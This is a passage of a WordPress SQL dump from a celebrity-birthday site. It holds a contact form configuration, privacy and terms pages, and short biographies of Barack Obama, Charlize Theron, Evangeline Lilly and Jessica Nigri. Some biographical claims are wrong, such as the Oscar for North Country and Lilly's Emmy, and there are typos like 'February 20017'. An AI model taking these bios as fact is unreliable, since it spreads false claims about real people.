23:22:26','2015-07-23 23:22:26','',143,'http://birthdaypedia.com/wp-content/uploads/2015/07/Toby-Keith.jpg',0,'attachment','image/jpeg',0),(180,2,'2015-07-23 23:33:28','2015-07-23 23:33:28','','Tom Hanks','','inherit','open','open','','tom-hanks','','','2015-07-23 23:33:39','2015-07-23 23:33:39','',144,'http://birthdaypedia.com/wp-content/uploads/2015/07/Tom-Hanks.jpg',0,'attachment','image/jpeg',0),(181,2,'2015-07-23 23:40:45','2015-07-23 23:40:45','','Matthew Fox','','inherit','open','open','','matthew-fox','','','2015-07-23 23:40:53','2015-07-23 23:40:53','',150,'http://birthdaypedia.com/wp-content/uploads/2015/07/Matthew-Fox.jpg',0,'attachment','image/jpeg',0),(182,2,'2015-07-23 23:49:31','2015-07-23 23:49:31','','Daniel Radcliffe','','inherit','open','open','','daniel-radcliffe','','','2015-07-23 23:49:38','2015-07-23 23:49:38','',155,'http://birthdaypedia.com/wp-content/uploads/2015/07/Daniel-Radcliffe.jpg',0,'attachment','image/jpeg',0),(183,2,'2015-07-23 23:54:41','2015-07-23 23:54:41','','Manu Ginobili','','inherit','open','open','','manu-ginobili','','','2015-07-23 23:54:52','2015-07-23 23:54:52','',164,'http://birthdaypedia.com/wp-content/uploads/2015/07/Manu-Ginobili.jpg',0,'attachment','image/jpeg',0),(184,2,'2015-07-24 00:00:55','2015-07-24 00:00:55','','Arnold Schwarzenegger','','inherit','open','open','','governor-of-california-addresses-climate-change-meeting','','','2015-07-24 00:01:06','2015-07-24 00:01:06','',152,'http://birthdaypedia.com/wp-content/uploads/2015/07/Arnold-Schwarzenegger.jpg',0,'attachment','image/jpeg',0),(186,2,'2015-07-29 05:42:54','2015-07-29 05:42:54','<p>Your Name (required)<br />\r\n [text* your-name] </p>\r\n\r\n<p>Your Email (required)<br />\r\n [email* your-email] </p>\r\n\r\n<p>Subject<br />\r\n [text your-subject] </p>\r\n\r\n<p>Your Message<br />\r\n [textarea your-message] </p>\r\n\r\n<p>[recaptcha size:normal] <br /></p>\r\n\r\n<p>[submit \"Send\"]</p>\nBirthdayPedia Contact Form\nno-reply@birthdaypedia.com\nFrom: [your-name] <[your-email]>\r\nSubject: [your-subject]\r\n\r\nMessage Body:\r\n[your-message]\r\n\r\n--\r\nThis e-mail was sent from a contact form on BirthdayPedia (https://birthdaypedia.com)\ncontact@birthdaypedia.com\nReply-To: [your-email]\n\n\n\n\n[your-subject]\nBirthdayPedia <wordpress@birthdaypedia.com>\nMessage Body:\r\n[your-message]\r\n\r\n--\r\nThis e-mail was sent from a contact form on BirthdayPedia (https://birthdaypedia.com)\n[your-email]\nReply-To: glowens@gmail.com\n\n\n\nYour message was sent successfully. Thanks.\nFailed to send your message. Please try later or contact the administrator by another method.\nValidation errors occurred. Please confirm the fields and submit it again.\nFailed to send your message. Please try later or contact the administrator by another method.\nPlease accept the terms to proceed.\nPlease fill in the required field.\nThis input is too long.\nThis input is too short.\nYour entered code is incorrect.\nNumber format seems invalid.\nThis number is too small.\nThis number is too large.\nEmail address seems invalid.\nURL seems invalid.\nTelephone number seems invalid.\nYour answer is not correct.\nDate format seems invalid.\nThis date is too early.\nThis date is too late.\nFailed to upload file.\nThis file type is not allowed.\nThis file is too large.\nFailed to upload file. Error occurred.','Contact form 1','','publish','open','open','','contact-form-1','','','2017-01-27 19:46:49','2017-01-27 19:46:49','',0,'http://birthdaypedia.com/?post_type=wpcf7_contact_form&p=186',0,'wpcf7_contact_form','',0),(188,2,'2015-07-29 05:46:00','2015-07-29 05:46:00','<strong>What information do you collect about me?</strong>\r\n\r\nBirthdayPedia collects personal identifying information (“PII”) from you only if you voluntarily submit such information to us on website(s) and through e-mail. We also collect PII during transactions, sponsored events, mobile marketing campaigns, and contests/sweepstakes. When visiting one of our online sites, we collect user-specific information on what pages are visited and volunteered information such as survey information and/or site registrations. PII includes your name, postal address, e-mail address, telephone and cell phone numbers, wireless service provider, and all other information you provide to us.\r\n\r\nWe may collect information about your interaction with BirthdayPedia sites and services. For example, we may use Web site analytics tools on our site to retrieve information from your browser, including the site you came from, the search engine(s) and the keywords you used to find our site, the pages you view within our site, your browser add-ons, and your browser’s width and height. We may also use technologies, such as cookies and web beacons (described below) to collect information about the pages you view, the links you click and other actions you take on our sites and services. Additionally, we may collect certain standard information that your browser sends to every website you visit, such as your IP address, browser type and language, access times and referring Web site addresses.\r\n\r\nWhen you receive newsletters or promotional e-mail from BirthdayPedia, we may use web beacons (described below), customized links or similar technologies to determine whether the e-mail has been opened and which links you click in order to provide you more focused e-mail communications or other information.\r\n\r\nIn order to offer you a more consistent and personalized experience in your interactions with BirthdayPedia, information collected through one BirthdayPedia site or service may be combined with information obtained through other BirthdayPedia sites or services. We may also supplement the information we collect with information obtained from other companies.\r\n\r\n<strong>What’s in it for me?</strong>\r\n\r\nPlenty! The information we collect allows us to customize the content and/or layout of our page for each visitor. Plus, it enables us to notify you about updates to our Website… contact you with special offers of interest… and customize your Website experience. In addition, information is shared with reputable organizations that may contact you with special offers of possible interest.\r\n\r\n<strong>Your Privacy Rights</strong>\r\n\r\nFrom time to time, we make your PII available to other reputable businesses whose products or services might be of value to you. If you do not want us to share your PII with other companies or organizations, please let us know by emailing us at here .\r\n\r\n<strong>Transfers of Information for Legal Purposes</strong>\r\n\r\nBirthdayPedia may need to disclose certain information to comply with a legal requirement, such as a law, regulation, court order, subpoena, or search warrant, in the course of a legal proceeding or in response to a law enforcement agency request. If there is a change of control in BirthdayPedia business (whether by merger, sale, or otherwise) or a sale or transfer of its assets, customer information could be sold or transferred as part of that transaction and your PII potentially used by the Purchaser or other recipient of said customer information.\r\n\r\nYou acknowledge that BirthdayPedia is located in the United States of America (“U.S.”) and will process and store your information in the U.S., and that as a result, U.S. governments, courts or law enforcement or regulatory agencies may be able to obtain disclosure of your information through the laws of the U.S.\r\n\r\n<strong>Mobile Devices/Third Party Fees</strong>\r\n\r\nFrom time to time, BirthdayPedia may deploy mobile marketing campaigns and may allow you to register for services that involve messages and/or e-mails being sent to your mobile device. You are responsible for obtaining access to the mobile device services and that access may involve third-party fees, including mobile carrier, text messaging, or airtime charges. You are solely responsible for those fees, including any and all fees associated with the delivery of the messages, e-mails or other materials to your mobile device. Please consult your mobile service provider’s pricing plan prior to registering for any such service to determine the charges for sending and receiving text messages from/to your mobile device. You will be given the opportunity to opt-out of receiving text messages or emails to your mobile device at the time you register and with each message or email you receive.\r\n\r\nMobile marketing campaigns may involve your sending an e-mail from your mobile device to BirthdayPedia or a third-party campaign operator. An e-mail or other response will then be sent to your mobile device. Opting to participate in a campaign is 100% your choice. When you engage in these mobile marketing campaigns, BirthdayPedia and the third-party campaign operator collect your cell phone number, the name of your wireless service provider, images that you send using your cell phone as part of the campaign, and other relevant information.\r\n\r\n<strong>What are “cookies” and what do they do for me?</strong>\r\n\r\nIn order to provide better service when you return to our site, BirthdayPedia may use cookies to store your preferences and information about such things as items added to your shopping cart, purchases you have made with us, what pages you visit, and past activity at a site. “Cookies” are tiny pieces of information stored by your browser on your computer’s hard drive. Cookies are also used to ensure that you are not repeatedly sent the same banner ads and to customize Webpage content based on your browser type (Netscape or Microsoft Explorer, for example). Most browsers are initially set to accept cookies.\r\n\r\nIf you want to disable cookies, there is a simple procedure in most Internet browsers that allows you to turn off cookies. Please remember, however, that cookies may be required to allow you to use certain features of our sites.\r\n\r\nWe use third-party advertising companies to serve ads and collect information when users visit our site. These companies may use information (not including your name, address, email address or telephone number) about your visits to this and other websites in order to provide advertisements on our site, other websites and other forms of media about goods and services of interest to you. If you would like more information about this practice and to know your choices about not having this information used by these companies, check out<a href=\"http://www.networkadvertising.org/managing/opt_out.asp\">http://www.networkadvertising.org/managing/opt_out.asp</a> .\r\n\r\n<strong>Use of Web Beacons</strong>\r\n\r\nBirthdayPedia Website pages may contain electronic images known as Web beacons – sometimes called single-pixel gifs – that may be used to assist in delivering cookies on our sites and allow us to count users who have visited those pages and to deliver co-branded services. We may include Web beacons in promotional e-mail messages or our newsletters in order to determine whether messages have been opened and acted upon.\r\n\r\nBirthdayPedia may also employ Web beacons from third parties in order to help us compile aggregated statistics regarding the effectiveness of our promotional campaigns or other operations of our sites.\r\n\r\n<strong>Links</strong>\r\n\r\nBirthdayPedia sites may, on occasion, contain links to other sites with information gathering practices different from our own. Visitors should consult privacy policies for all other sites, as BirthdayPedia has no control over information submitted to or collected by such third parties.\r\n\r\nBirthdayPedia sites sometimes offer contest, sweepstakes, or promotions sponsored or co-sponsored by third parties. These third parties may obtain PII that visitors voluntarily submit to participate in the contest, sweepstakes, or promotion. BirthdayPedia has no control over the third-party sponsor’s use of this information. The BirthdayPedia site will notify you at the time of requesting PII if third-party sponsors will be provided with such information.\r\n\r\n<strong>Changes…</strong>\r\n\r\nBirthdayPedia may need to change this privacy policy from time to time in order to address new issues, evolving technologies, changes on our sites, or business practices. BirthdayPedia will post those changes so you will always know what information we gather and how we might use that information. Please refer back to this policy regularly.\r\n\r\n<strong>Rules for Submissions and Messages</strong>\r\n\r\nResponsibility for what is posted in the discussion groups or other public forums lies with each user – you alone are responsible for the content of your messages and the consequences of any such messages. We cannot and do not review every submission a user may make. We neither endorse nor guarantee the accuracy or propriety of any submission. We do, however, reserve the right but do not assume the obligation to restrict or prohibit your use of our sites if we believe you are violating any of the terms of the agreement and to remove, edit, or relocate any submission as we see fit whether for legal or other reasons.\r\n\r\n<strong>Member Conduct</strong>\r\n\r\nYou understand that all information, data, text, software, music, sound, photographs, graphics, video, messages or other materials (“Content”), whether publicly posted or privately transmitted, are the sole responsibility of the person from which such Content originated. This means that you, and not BirthdayPedia, are entirely responsible for all Content that you upload, post, or otherwise transmit. BirthdayPedia does not control the Content posted and, as such, does not guarantee the accuracy, integrity, or quality of such Content. You understand that by using a BirthdayPedia site, you may be exposed to Content that is offensive, indecent or objectionable.\r\n\r\nBirthdayPedia Copyright Agent may be contacted at: Copyright Agent, BirthdayPedia, 245 West 19th St, New York, New York, 10011.\r\n\r\n<strong>We appreciate the opportunity to serve you!</strong>\r\n\r\nIf you have any questions regarding this privacy policy statement or if you feel that this site has not followed its stated information policy, feel free to contact us. Our postal address is: 245 West 19th St, New York, New York, 10011.. and we can be reached via e-mail here\r\n\r\nAdditionally, you may contact your state or local consumer protection office, The Direct Marketing Association’s Committee on Ethical Business Practices, the Better Business Bureau, or The Federal Trade Commission by phone at (202) FTC-HELP (202/382-4357) and online at www.ftc.gov.\r\n\r\nNote: This privacy policy applies to all of BirthdayPedia owned and operated websites and to BirthdayPedia other information gathering activities.','PRIVACY POLICY','','publish','open','open','','privacy-policy','','','2017-01-27 19:44:55','2017-01-27 19:44:55','',0,'http://birthdaypedia.com/?page_id=188',0,'page','',0),(194,2,'2015-07-29 16:52:32','2015-07-29 16:52:32','<h2>BirthDayPedia.com Terms of Use</h2>\r\n*Your use of BirthDayPedia.com and its services, resources and content is subject to our Privacy Policy and our Terms and Conditions as follows:\r\n\r\nEntertainment and information only\r\n\r\nBirthDayPedia.com operates an online consulting service called Ask BirthDayPedia (the “Service”) for educational and entertainment purposes only. By using the Service, you expressly acknowledge and understand that there are risks and limitations associated with online consulting services.\r\n\r\nThe contents of Ask BirthDayPedia, such as text, graphics, images, and other material contained on the Ask BirthDayPediaSite (“Content”) are for informational and entertainment purposes only.\r\n\r\nNo management of content –\r\n\r\nYou expressly acknowledge that we are unable to directly manage the Service or edit, modify, screen, or otherwise review the Content posted by licensed Professionals. As a result, we do not have absolute control over the quality, safety, or legality of the answers that are provided through our services. You also expressly acknowledge that in the case where a licensed professional answers your questions a Professional-Client-Patient Relationship will NOT be established and that this service will not be able to diagnose, treat, or prescribe.\r\n\r\nNo endorsement of products or services by BirthDayPedia\r\n\r\nThe answers given are not endorsed by BirthDayPediaand are the responses of the individual giving them. If such answer includes an endorsement of a particular brand of product or service, such endorsement is given by the individual only and NOT BirthDayPedia.\r\n\r\nYour use of this site is at your own risk\r\n\r\nBirthDayPedia IS NOT RESPONSIBLE FOR ANY LOSS, INJURY, CLAIM, LIABILITY, OR DAMAGE RELATED TO YOUR USE OF THIS SITE OR ANY SITE LINKED TO THIS SITE, WHETHER FROM ERRORS OR OMISSIONS IN THE CONTENT OF OUR SITE OR ANY OTHER LINKED SITES, FROM THE SITE BEING DOWN, OR FROM ANY OTHER USE OF THIS SITE.\r\n\r\nYou agree to not use BirthDayPedia in order to:\r\n\r\n• upload, post, or otherwise transmit any Content that is unlawful, harmful, threatening, abusive, harassing, tortuous, defamatory, vulgar, obscene, libelous, invasive of another’s privacy, hateful, or racially, ethnically or otherwise objectionable;\r\n\r\n• harm minors in any way;\r\n\r\n• impersonate any person or entity, including, but not limited to, a BirthDayPedia official, forum leader, guide or host, or falsely state or otherwise misrepresent your affiliation with a person or entity;\r\n\r\n• forge headers or otherwise manipulate identifiers in order to disguise the origin of any Content transmitted through the Service or develop restricted or password-only access pages, or hidden pages or images (those not linked to from another accessible page);\r\n\r\n• upload, post, or otherwise transmit any Content that you do not have a right to transmit under any law or under contractual or fiduciary relationships (such as inside information, proprietary and confidential information learned or disclosed as part of employment relationships or under nondisclosure agreements);\r\n\r\n• upload, post, or otherwise transmit any Content that infringes any patent, trademark, trade secret, copyright, or other proprietary rights of any party;\r\n\r\n• upload, post, or otherwise transmit any unsolicited or unauthorized advertising, promotional materials, “junk mail,” “spam,” “chain letters,” “pyramid schemes,” or any other form of solicitation, except in those areas of the Service that are designated for such purpose;\r\n\r\n• upload, post, or otherwise transmit any material that contains software viruses or any other computer code, files or programs designed to interrupt, destroy or limit the functionality of any computer software or hardware or telecommunications equipment;\r\n\r\n• interfere with or disrupt the servers or networks connected to the BirthDayPedia site, or disobey any requirements, procedures, policies or regulations of networks connected to the site;\r\n\r\n• intentionally or unintentionally violate any applicable local, state, national or international law, including, but not limited to, regulations promulgated by the U.S. Securities and Exchange Commission, any rules of any national or other securities exchange, including, without limitation, the New York Stock Exchange, the American Stock Exchange or the NASDAQ, and any regulations having the force of law;\r\n\r\n• “stalk” or otherwise harass another;\r\n\r\n• collect or store personal data about other users;\r\n\r\n• promote or provide instructional information about illegal activities, promote physical harm or injury against any group or individual, or promote any act of cruelty to animals;\r\n\r\n• use your home page (or directory) as storage for remote loading or as a door or signpost to another home page; or\r\n\r\n• engage in commercial activities without the express written consent of BirthDayPedia. This includes, but is not limited to, the following activities:\r\n\r\no offering for sale any products or services;\r\n\r\no soliciting for advertisers or sponsors;\r\n\r\no conducting raffles or contests that require any type of entry fee;\r\n\r\no displaying a sponsorship banner of any kind, including those that are generated by banner or link exchange services\r\n\r\no displaying banners for services that provide cash or cash-equivalent prizes to users in exchange for hyperlinks to their websites.\r\n\r\nRights\r\n\r\nYou acknowledge that we acquire all Rights to use any posted materials as described above so that we do not violate any Rights you may have in materials you post. By submitting content to or through our sites, you grant us the non-exclusive right to reproduce, modify, and distribute it as we see fit in any medium and for any purpose in any form, media, or technology now known or later developed. You vouch that any material you submit does not violate, plagiarize, or infringe upon the right of any third party, including copyright, trademark, or proprietary rights. If non-original content is included in your posting, you must cite back to the content owner and attribute it.\r\n\r\nCopyrights and Copyright Agent\r\n\r\nBirthDayPedia respects the rights of all copyright holders. If you believe that your work has been copied and used on one of our Sites in a way that constitutes copyright infringement, please provide BirthDayPedia Copyright Agent the following information required by Section 512 of the Digital Millennium Copyright Act:\r\n\r\n• A physical or electronic signature of a person authorized to act on behalf of the owner of an exclusive right that is allegedly infringed;\r\n\r\n• Identification of the copyright work claimed to have been infringed, or, if multiple copyrighted works at a single on-line site are covered by a single notification, a representative list of such works at that site;\r\n\r\n• Identification of the material that is claimed to be infringing or to be the subject of infringing activity and that is to be removed or access to which is to be disabled, and information reasonably sufficient to permit us to locate the material;\r\n\r\n• Information reasonably sufficient to permit the service provider to contact the complaining party;\r\n\r\n• A statement that the complaining party has a good-faith belief that use of the material in the manner complained of is not authorized by the copyright owner, its agent, or the law; and\r\n\r\n• A statement that the information in the notification is accurate, and under penalty of perjury, that the complaining party is authorized to act on behalf of the owner of an exclusive right that is allegedly infringed.\r\n\r\nBirthDayPedia Copyright Agent may be contacted at: Copyright Agent, BirthDayPedia , 245 West 19th St, New York, New York, 10011..\r\n\r\nWe appreciate the opportunity to serve you!\r\n\r\nIf you have any questions regarding this privacy policy statement or if you feel that this site has not followed its stated information policy, feel free to contact us. Our postal address is: 245 West 19th St, New York, New York, 10011, and we can be reached via e-mail here\r\n\r\nAdditionally, you may contact your state or local consumer protection office, The Direct Marketing Association’s Committee on Ethical Business Practices, the Better Business Bureau, or The Federal Trade Commission by phone at (202) FTC-HELP (202/382-4357) and online at www.ftc.gov.\r\n\r\nNote: This privacy policy applies to all of BirthDayPedia owned and operated websites and to BirthDayPedia’s other information gathering activities.\r\n\r\nBirthDayPedia complies with all the stringent standards of ethical conduct set forth by the Direct Marketing Association.','TERMS OF USE','','publish','open','open','','terms-of-use','','','2017-01-27 19:44:43','2017-01-27 19:44:43','',0,'http://birthdaypedia.com/?page_id=194',0,'page','',0),(195,2,'2015-07-29 17:32:58','2015-07-29 17:32:58','','Terms of Use','','publish','open','closed','','195','','','2017-01-27 19:45:44','2017-01-27 19:45:44','',0,'http://birthdaypedia.com/?p=195',4,'nav_menu_item','',0),(196,2,'2015-07-29 17:32:58','2015-07-29 17:32:58','','Privacy Policy','','publish','open','closed','','196','','','2017-01-27 19:45:45','2017-01-27 19:45:45','',0,'http://birthdaypedia.com/?p=196',5,'nav_menu_item','',0),(199,2,'2015-08-04 16:08:06','2015-08-04 16:08:06','Barrack Hussein Obama, the President of the United States Of America, was born on August 4, 1961, to Barrack Obama Sr., a black Kenyan father, and Ann Dunham, a white American Mother. His father earned a scholarship to study in the University of Hawaii, which made him leave <a href=\"https://en.wikipedia.org/wiki/Kenya\" target=\"_blank\">Kenya</a> to pursue his dreams. While in the U.S., he met Ann Dunham, a fellow student, and they married in 1961. Obama was then born six months later. While he was still young, his father relocated to Massachusetts to pursue a Ph.D, which made him separate with his wife and months later ultimately divorced. Obama was only 2 years at the time.\r\n\r\nDunham married in 1965 to Lolo Soetoro, and the family moved to Indonesia a year after. Obama enrolled in Punahou Academy while he was living with his grandparents, graduating with academic honors. In 1982, when he was 21 years old, his father died of a car crash as he was travelling in Nairobi. Obama went ahead to study at Occidental College located in Las Angeles, where he stayed for two years before transferring to Columbia University. In 1983 he graduated with a political science degree. After working for two years in the business sector, he moved to law and went to further his education in Harvard Law School, and later went to Chicago to practice as a lawyer.\r\n<h2>Career Accomplishments</h2>\r\nThe entry into Illinois politics saw <a href=\"https://www.barackobama.com/\" target=\"_blank\">Barack Obama</a>’s career take a new turn. He started by publishing a book, Dreams From My Father, in 1995, which was received with high praises from notable literally figures such as Toni Morrison. His advocacy as a civil rights lawyer led him to run for Illinois State Senate in 1996, which he won comfortably. During this time he helped in creating a state earned-income tax credit in order to help the poor. He managed to beat other competitors to become chairman of Health and Human Services Committee in Illinois Senate, working with law enforcers to introduce videotaping of confessions and interrogations in all capital cases.\r\n\r\nFollowing the devastating 9/11 attacks that happened in 2001, Barrack was an opponent to President George W. Bush’s directive to take solders to war in Iraq. In 2006, he wrote his second book entitled The Audacity of Hope, which discussed his vision for America’s future. Shortly after the book was released, it become best selling on both Amazon and New York Times. Obama made headlines in February 20017 when he announced that he was to be one of the candidates in the 2008 presidential nominations for Democrats. He won the nomination and later the 44th President of the United States, beating John McCain. After serving his first term, Obama ran again for the same seat and won, giving him another term as the president.\r\n<h2>Most Known For</h2>\r\nBarrack Obama is the 44th President of the United States. He is best known for his leadership style, having led the U.S for two terms. He is also famous for his <a href=\"http://birthdaypedia.com/arnold-schwarzenegger/\">political life</a>, especially as the Senator of Illinois State, serving from 1997-2004.\r\n<h2>Current Personal Life</h2>\r\nOn October 3, 1992, Barrack Obama married Michele Obama, with whom he had tow daughters: Malia (born in 1998) and Sasha (born in 2001). He is named as one of the most influential people by Time Magazine, and one of top 10 people who can change the world by New State Magazine. He is the first African-American person to be elected as the President of the United States, as well as the first American President to come from Hawaii.\r\n<h2>Where is he now</h2>\r\nBeing the 44th <a href=\"http://birthdaypedia.com/pamela-anderson/\">President of the United States</a>, Barrack Obama lives in the White House located in Washington, DC. He lives with his wife and two daughters. His paternal relatives, however, still live in Kenya, where he has visited once since he was elected the President of the United States.\r\n\r\n[<a href=\"https://www.flickr.com/photos/soldiersmediacenter/4097699785/sizes/z/\" target=\"_blank\">Image</a>]\r\n\r\n ','Barack Obama','','publish','open','open','','barack-obama','','','2015-10-09 18:24:32','2015-10-09 18:24:32','',0,'http://birthdaypedia.com/?p=199',0,'post','',0),(200,2,'2015-08-07 07:19:32','2015-08-07 07:19:32','Philanthropist and actress <a href=\"http://www.imdb.com/name/nm0000234/\" target=\"_blank\">Charlize Theron</a> was born on August 7, 1975 in Benoni, South Africa. She began ballet lessons at only six in order to foster her artistic leanings. By the age of 12, she moved to a boarding school in Johannesburg, where she would study dance. When Theron turned 15, her father’s struggle with alcoholism became intense, especially when he started being violent to her and her mother. Theron watched in dismay as her mother Gerda shot her father, but the murder was deemed as self defense.\r\n\r\nAt the age of 16, Charlize registered for Johannesburg modeling contest and won. On realizing how talented she was, she soon travelled to Italy to contest in <a href=\"http://www.modelmanagement.com/blog/2013/03/13/fresh-faces-2013-model-contest-launched-and-its-bigger-than-ever/\" target=\"_blank\">bigger modeling competitions</a>. By winning the competition of New Model Today, her career took a turn and she was offered numerous opportunities in the modeling scene. Two years later, Theron decided to take a break from modeling and try dancing, which she was passionate about. She moved to New York at the age of 18 and started a career in dancing, but all did not go well when she suffered severe injuries that forced her to abandon her dream job.\r\n<h2>Career Accomplishments</h2>\r\nNow that she couldn’t dance, Theron made a decision to try acting instead, which saw her move to <a href=\"http://birthdaypedia.com/miranda-cosgrove/\">Los Angeles</a>. Her Afrikaner accent seemed to be a barrier in seeing her land speaking roles, but she did not give up. She sat and watched hours of television, looking to strove to hide her roots and adopt perfect American inflections. A Hollywood manager known as John Crosby offered to sign her, giving her a role in the 1995 film Children of the Corn III. Larger parts followed soon after, and she took up roles in That Thing You Do! and 2 Days in the Valley. As her presence became more evident in Hollywood, she landed another role, being cast alongside Keanu Reeves and Al Pacino in the 1997 film The Devil’s Advocate.\r\n\r\nSuccess continued for Charlize, and she took on another drama, North County, where she portrayed an iron miner who was fighting sexual harassment. Her role in the film saw her earn a nomination at the Oscars and Golden Globes. Other films that Theron has been featured include Hancock, Young Adult, Prometheus, A Million ways to Die in the West, and Mad Max Fury Road, which was released in 2015.\r\n<h2>Most Known For</h2>\r\nCharlize Theron is a Hollywood actress best known for her role in the <a href=\"http://birthdaypedia.com/daniel-radcliffe/\">film industry</a>. She has been featured in big films such as Monster and North Country, both of which she won Academy Award.\r\n<h2>Current Personal Life</h2>\r\nCharlize was born in South Africa but traveled to the U.S. to pursue her dreams. In 2008, she announced that she would become a U.S. citizen, but still maintain her South African citizenship. She had been in a long-term relationship with Stuart Townsend, a Hollywood actor, but the couple separated in 2010. In late 2013, she was romantically linked to Sean Penn, an actor, but later on reports surfaced that they had broken up.\r\n\r\nCharlize has two children: Jackson and August, both of whom she adopted in 2012 and 2015 respectively.\r\n<h2>Where is she now</h2>\r\nTheron lives in Los Angeles with her two children. She is still active in acting, and is looking to land more roles in coming films. The latest film she was featured, Mad Max Furry Road, made huge sales within a short time of release.\r\n\r\n[<a href=\"https://www.flickr.com/photos/gageskidmore/6852649302/sizes/z/\" target=\"_blank\">Image</a>]\r\n\r\n ','Charlize Theron','','publish','open','open','','charlize-theron','','','2015-10-14 14:11:42','2015-10-14 14:11:42','',0,'http://birthdaypedia.com/?p=200',0,'post','',0),(201,2,'2015-08-03 07:30:28','2015-08-03 07:30:28','Canadian actress and actor <a href=\"http://lostpedia.wikia.com/wiki/Evangeline_Lilly\" target=\"_blank\">Nicole Evangeline Lilly</a> was born on August 3, 1979, in the city of Fort Saskatchewan, Alberta. She has been instrumental in the entertainment scene, having won Screen Actors Guild Award as well as a Golden Globe nomination thanks to her role in Lost, an ABC series. Evangeline went to W.J Mouat Secondary Schools located in British Columbia, graduating with good grades. She was voted the vice-president of the student’s council and played soccer whenever she had some free time. While in college, Lilly worked as a waitress and later flight attendant in order to meet her basic needs and pay for her tuition.\r\n\r\nEvangeline Lilly started her career when <a href=\"http://models.fordmodels.com/\" target=\"_blank\">Ford Modeling Agency</a> discovered her talent, giving her roles in non-speaking parts in Kingdom Hospital and Smallville TV shows, as well as commercials. Her breakthrough didn’t seem to come yet until she landed a role in Lost, one of the most popular TV series in 2004.\r\n<h2>Career Accomplishments</h2>\r\nLilly enjoyed six years of success, with Lost running from 2004-2010. Her role as Kate saw her win Prime Time Emmy Awards and Golden Globe. She appeared in a total of 116 episodes, with her role taking the female lead. Her portrayal was voted the no. 1 sexiest woman by TV Guide, making her even more popular around the world. After shooting the last episode of Lost, she said that she wanted to take a break from acting and focus on her humanitarian and charity efforts, which she was compassionate about since a tender age. In 2010, she announced that she will begin writing children’s book as she proceeded with acting as a day job when possible. This was evident on July, 2013 when Lilly made headlines with her book, The Squickerwonkers, which she released at the San Diego Comic-Con International. Lilly also appeared in Real Street as Bailey Tallet despite having refused to be featured in a number of films. In 2012, she took up a part in <a href=\"http://birthdaypedia.com/ian-mckellen/\">The Hobbit</a>, a film which recorded huge sales within the U.S. and other regions. She also played a superhero film called Ant-man in 2015.\r\n<h2>Most Known For</h2>\r\nEvangeline Lilly, a Canadian actress, is mostly known for her involvement in humanitarian and charity work as well as acting career. She is famous for her roles in various films such as Ant-Man, Hope Van Dyne, The Hobbit, The Hurt Locker, and psychologist thriller Afterwards. Since she was 14, she has volunteered in many projects, especially in the Philippines.\r\n<h2>Current Personal Life</h2>\r\nLilly got married to Murray Hone, a Canadian hockey player, but the relationship only lasted from 2003 to 2004. After the devastating separation, she dated Norman Kali, giving birth to a son called Kahekili in 2011. Earlier in June 2015, she announced that she and her husband are expecting a second child. Currently she works with organizations like Go Campaign, and is very <a href=\"http://birthdaypedia.com/jamie-oliver/\">active in charity works</a> in Africa and other regions.\r\n<h2>Where is she now</h2>\r\nLilly lives in Hawaii with her husband Norman Kali and son Kahekili. She says that she is happy with her humanitarian efforts, auctioning launches to help orphans and widows in Rwanda.\r\n\r\n[<a href=\"https://www.flickr.com/photos/gageskidmore/14796750584/sizes/z/\" target=\"_blank\">Image</a>]\r\n\r\n ','Evangeline Lilly','','publish','open','open','','evangeline-lilly','','','2015-10-09 18:38:03','2015-10-09 18:38:03','',0,'http://birthdaypedia.com/?p=201',0,'post','',0),(202,2,'2015-08-05 08:41:28','2015-08-05 08:41:28','Voice actress, promotional model and American cosplay celebrity, Jessica Nigri, was born on August 5, 1989, in Reno, Nevada. Although she held an American nationality, she grew up in her mother’s birthplace, <a href=\"http://birthdaypedia.com/dwayne-the-rock-johnson/\">New Zealand</a>, and later moved to Arizona. Jessica was interested in cosplaying and acting since her early school days. In 2009, she started her career at the San Diego Comic-Con, cosplaying Sexy Pikachu, an appearance which went viral all over the internet. Two years later, she went ahead to promote Microsoft’s game Gears of War 3. She dressed as <a href=\"http://n4g.com/news/925234/jessica-nigri-as-anya-stroud-from-gears-of-war-3-cosplay\" target=\"_blank\">Anya Stroud</a>, the game’s character, at the promotional event, something which made her very popular.\r\n<h2>Career Accomplishments</h2>\r\nThe much-awaited breakthrough did not come yet, even after being featured in Microsoft’s game promotional event. Jessica believed that she had to push on to make a good name for herself as well as her career. In 2012, her dreams became a reality when she won IGN’s model contest, where she portrayed protagonist of Lollipop Chainsaw game, Juliet Starling. She was hired by Warner Bros Games as a <a href=\"http://birthdaypedia.com/pamela-anderson/\" target=\"_blank\">spokesmodel</a>, appearing in Penny Arcade Expo in that same year. She also signed up to represent and promote a number of other projects, including comic book series Knightingail and Grimm Fairly Tales, and Elsword, a video game.\r\n\r\nIn 2013, Jessica was approached to portray a character from Killer is Dead, a video game, which she gladly accepted. That same year, she was also hired by Ubisort to play a female version of the protagonist of game Assassin’s Creed IV. She also represented Yaiba: Ninja Gaiden Z, Tecmo Koeil’s video game, where she was required to portray Miss Monday character. She cosplayed at Wildastar PX East booth at Carbine Studios in 2014.\r\n\r\nJessica Nigri has worked for various media outlets as an interviewer, including Comic Book Therapy, Rugged TV and GameZone. She has also starred in a number of music videos, video advertisements and charity work. She says that she has played video games starting at age of seven when she was exposed to them by her father. Playstation Official Magazine says that Jessica is not just a cosplayer and YouTuber, but also a massive gamer. She has been very active, cosplaying for the XX Girls Group and LT3, a sponsored gaming team by Mad Catz.\r\n<h2>Most Known For</h2>\r\nJessica is a well known fan interview correspondent, promotional model, voice actress, YouTuber and <a href=\"http://www.mtv.com/news/2205208/celebrity-secret-cosplay/\" target=\"_blank\">cosplay celebrity</a>. She is a sensational lady known for her role as an official spokesmodel for video games as well as comic books such as Assassin’s Creed IV and Lollipop Chainsaw.\r\n<h2>Current Personal Life</h2>\r\nJessica Nigri is an attractive lady with a height of 5 feet 7 inches. She has kept her personal life aside from her career, leaving many people speculating of her love life. She doesn’t mention anything about her past affairs and makes it a subject of mystery to her fans. As of today, many magazines portray her as single.\r\n<h2>Where is she now</h2>\r\nJessica is believed to live in San Diego, where she has worked for years. She, however, says that she plans to retire from modeling and proceed to pursue a career n marketing and advertising.\r\n\r\n[<a href=\"https://www.flickr.com/photos/27594459@N04/7064286955/sizes/c/\" target=\"_blank\">Image</a>]\r\n\r\n ','Jessica Nigri','','publish','open','open','','jessica-nigri','','','2015-10-09 18:23:06','2015-10-09 18:23:06','',0,'http://birthdaypedia.com/?p=202',0,'post','',0),(203,2,'2015-08-06 07:50:35','2015-08-06 07:50:35','<a href=\"http://www.marisamiller.com/\" target=\"_blank\">Marisa Miller</a> was born on August 6, 1978, in the city of Santa Cruz, California. She is an American model famous for her great work for 